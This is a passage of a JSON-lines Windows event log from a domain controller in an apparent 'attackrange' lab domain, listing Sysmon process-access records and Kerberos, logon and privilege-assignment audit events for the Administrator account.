C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5555,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5556,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5557,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nSourceProcessId: 1592\r\nSourceThreadId: 4204\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-00106CE50800}\r\nTargetProcessId: 4884\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","SourceProcessId":"1592","SourceThreadId":"4204","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-00106CE50800}","TargetProcessId":"4884","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5558,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.284\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.284","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220639,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-2231640892-1842410504-3836505531-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220640,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-6178966$\r\n\tService ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220641,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220642,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E69E\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{18E02F3A-3B97-BC76-B3F7-3D93123202F3}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8e69e","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{18E02F3A-3B97-BC76-B3F7-3D93123202F3}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220643,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8E69E\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x8e69e","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5559,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 